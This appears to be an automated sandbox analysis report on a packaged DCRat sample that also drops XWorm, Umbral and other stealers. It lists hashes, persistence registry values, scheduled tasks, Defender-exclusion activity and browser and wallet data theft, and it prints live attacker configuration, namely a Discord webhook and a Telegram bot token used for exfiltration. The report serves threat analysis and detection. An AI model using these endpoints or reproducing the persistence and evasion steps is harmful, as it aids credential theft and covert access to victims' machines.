Analysis
-
max time kernel
129s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
12-06-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
DCRat by C3lestial.fun.rar
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
DCRat by C3lestial.fun.rar
Resource
win10v2004-20240226-en
General
-
Target
DCRat by C3lestial.fun.rar
-
Size
33.5MB
-
MD5
3112a622ece7c44b53c87e949af1ddd5
-
SHA1
a770bef606f2ca9927a9500c20bdbf77cc0fc820
-
SHA256
94e6c2037598e41f66f734e1e1e0934c1a167f5a9825d221dcc7c8dbdaaca6ff
-
SHA512
6b5ded758418832c45c5c5273ddea5cc1a92c466a50289f9920b2d781f0de55199582ab4667e35155a592cd786f1498bf8c8199bf59212c13ae4ae6cee646139
-
SSDEEP
786432:7gF2TX5HO7SWzCzw2HjIDuaMivz67rEhebp02lUrSRPTz+:G2TX5O79Wz9w2IzfAb0rSRP2
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1248497570939011083/iys0Q-I2H74ZeU8iK8mxnadLGnKvFVeC_daDGNMshULRzjYbAnJMv_etelbvONsTKIUG
Extracted
xworm
-
Install_directory
%Temp%
-
install_file
update.exe
-
pastebin_url
https://pastebin.com/raw/CNZj0axn
-
telegram
https://api.telegram.org/bot7009114103:AAGQ9PxSyhh1FE2I9esEeyfU9zAsNkooOqo/sendMessage?chat_id=1180155027
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Umbral payload 4 IoCs
resource yara_rule behavioral1/files/0x000500000001935f-505.dat family_umbral behavioral1/files/0x000400000001d3ca-590.dat family_umbral behavioral1/memory/1712-593-0x0000000001250000-0x0000000001290000-memory.dmp family_umbral behavioral1/memory/788-592-0x0000000000400000-0x00000000012FD000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000400000001d3bc-515.dat family_xworm behavioral1/memory/572-527-0x00000000001B0000-0x00000000001C8000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\", \"C:\\Windows\\LiveKernelReports\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\creal.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\System.exe\", \"C:\\Recovery\\1fdecb22-2889-11ef-9d63-46d84c032646\\csrss.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Setup Files\\{AC76BA86-7AD7-1033-7B44-A90000000001}\\dwm.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\", \"C:\\Windows\\LiveKernelReports\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\creal.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\System.exe\", \"C:\\Recovery\\1fdecb22-2889-11ef-9d63-46d84c032646\\csrss.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\", \"C:\\Windows\\LiveKernelReports\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\creal.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\System.exe\", \"C:\\Recovery\\1fdecb22-2889-11ef-9d63-46d84c032646\\csrss.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Setup Files\\{AC76BA86-7AD7-1033-7B44-A90000000001}\\dwm.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\sppsvc.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\", \"C:\\Windows\\LiveKernelReports\\cmd.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\", \"C:\\Windows\\LiveKernelReports\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\creal.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\System.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\", \"C:\\Windows\\LiveKernelReports\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\creal.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\System.exe\", \"C:\\Recovery\\1fdecb22-2889-11ef-9d63-46d84c032646\\csrss.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Setup Files\\{AC76BA86-7AD7-1033-7B44-A90000000001}\\dwm.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\sppsvc.exe\", \"C:\\Windows\\SchCache\\winlogon.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\", \"C:\\Users\\Admin\\Local Settings\\Idle.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\", \"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\", \"C:\\Windows\\LiveKernelReports\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\creal.exe\"" ComponentcrtSvc.exe -
Process spawned unexpected child process 39 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1928 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2188 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2468 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2792 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2296 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2408 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 852 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 868 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1244 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 596 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2288 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1040 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2612 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1036 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 584 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1592 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1308 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2336 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1620 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1092 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2204 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2356 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2884 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1688 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2096 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1588 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3016 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2980 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1028 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1148 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2712 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1424 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2380 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 876 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 336 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1516 568 schtasks.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1556 568 schtasks.exe 40 -
resource yara_rule behavioral1/files/0x000500000001935f-505.dat dcrat behavioral1/files/0x000400000001d3be-521.dat dcrat behavioral1/memory/788-592-0x0000000000400000-0x00000000012FD000-memory.dmp dcrat behavioral1/files/0x000400000001d3c6-654.dat dcrat behavioral1/memory/2320-655-0x0000000000200000-0x00000000003E4000-memory.dmp dcrat behavioral1/memory/3020-915-0x00000000003D0000-0x00000000005B4000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2736 powershell.exe 2288 powershell.exe 2324 powershell.exe 1668 powershell.exe 1304 powershell.exe 992 powershell.exe 2388 powershell.exe 1476 powershell.exe 3068 powershell.exe 948 powershell.exe 2680 powershell.exe 1964 powershell.exe 2344 powershell.exe 840 powershell.exe 2816 powershell.exe 2248 powershell.exe 2780 powershell.exe 2296 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe creal.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk XWorm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk XWorm.exe -
Executes dropped EXE 9 IoCs
pid Process 788 DCRat.exe 2248 SHEETRAT.exe 572 XWorm.exe 2076 DCRat.exe 1336 creal.exe 1712 Umbral.exe 1860 creal.exe 2320 ComponentcrtSvc.exe 3020 audiodg.exe -
Loads dropped DLL 48 IoCs
pid Process 788 DCRat.exe 788 DCRat.exe 788 DCRat.exe 788 DCRat.exe 788 DCRat.exe 1336 creal.exe 1860 creal.exe 1860 creal.exe 3020 cmd.exe 3020 cmd.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe 1860 creal.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 27 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Setup Files\\{AC76BA86-7AD7-1033-7B44-A90000000001}\\dwm.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\sppsvc.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\update.exe" XWorm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Admin\\Local Settings\\Idle.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Setup Files\\{AC76BA86-7AD7-1033-7B44-A90000000001}\\dwm.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\creal.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\System.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\1fdecb22-2889-11ef-9d63-46d84c032646\\csrss.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\LiveKernelReports\\cmd.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\creal.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\sppsvc.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\LiveKernelReports\\cmd.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\System.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\1fdecb22-2889-11ef-9d63-46d84c032646\\csrss.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Windows Mail\\en-US\\sppsvc.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\SchCache\\winlogon.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\taskhost.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\SchCache\\winlogon.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Mozilla Firefox\\fonts\\wininit.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Idle.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Admin\\Local Settings\\Idle.exe\"" ComponentcrtSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Windows\\ServiceProfiles\\LocalService\\Documents\\audiodg.exe\"" ComponentcrtSvc.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 28 IoCs
flow ioc 31 pastebin.com 30 discord.com 25 discord.com 26 discord.com 41 discord.com 42 discord.com 32 discord.com 34 discord.com 16 discord.com 22 discord.com 40 discord.com 23 discord.com 24 discord.com 27 discord.com 29 discord.com 35 discord.com 15 discord.com 17 discord.com 33 pastebin.com 36 discord.com 37 discord.com 39 discord.com 18 discord.com 19 discord.com 20 discord.com 21 discord.com 28 discord.com 38 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com 8 api.ipify.org 9 api.ipify.org -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe ComponentcrtSvc.exe File created C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe ComponentcrtSvc.exe File created C:\Program Files\Mozilla Firefox\fonts\wininit.exe ComponentcrtSvc.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe ComponentcrtSvc.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe ComponentcrtSvc.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\6cb0b6c459d5d3 ComponentcrtSvc.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\0a1fd5f707cd16 ComponentcrtSvc.exe File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\b75386f1303e64 ComponentcrtSvc.exe File created C:\Program Files (x86)\Windows Mail\en-US\0a1fd5f707cd16 ComponentcrtSvc.exe File created C:\Program Files\Mozilla Firefox\fonts\56085415360792 ComponentcrtSvc.exe File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe ComponentcrtSvc.exe File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\27d1bcfc3c54e0 ComponentcrtSvc.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\ServiceProfiles\LocalService\Documents\42af1c969fbb7b ComponentcrtSvc.exe File created C:\Windows\LiveKernelReports\cmd.exe ComponentcrtSvc.exe File created C:\Windows\LiveKernelReports\ebf1f9fa8afd6d ComponentcrtSvc.exe File created C:\Windows\servicing\de-DE\audiodg.exe ComponentcrtSvc.exe File created C:\Windows\SchCache\winlogon.exe ComponentcrtSvc.exe File created C:\Windows\SchCache\cc11b995f2a76d ComponentcrtSvc.exe File created C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe ComponentcrtSvc.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x000500000001935f-505.dat pyinstaller behavioral1/files/0x000400000001d3c0-538.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 39 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1092 schtasks.exe 1028 schtasks.exe 2380 schtasks.exe 584 schtasks.exe 2288 schtasks.exe 1036 schtasks.exe 1308 schtasks.exe 2356 schtasks.exe 876 schtasks.exe 1516 schtasks.exe 868 schtasks.exe 852 schtasks.exe 2204 schtasks.exe 2680 schtasks.exe 1556 schtasks.exe 2792 schtasks.exe 3016 schtasks.exe 2980 schtasks.exe 336 schtasks.exe 1588 schtasks.exe 1688 schtasks.exe 1148 schtasks.exe 1244 schtasks.exe 596 schtasks.exe 1040 schtasks.exe 2612 schtasks.exe 2884 schtasks.exe 2468 schtasks.exe 2296 schtasks.exe 1592 schtasks.exe 2336 schtasks.exe 1620 schtasks.exe 2096 schtasks.exe 2712 schtasks.exe 2188 schtasks.exe 2024 schtasks.exe 2408 schtasks.exe 1424 schtasks.exe 1928 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 848 wmic.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1900 tasklist.exe -
Modifies registry class 64 IoCs
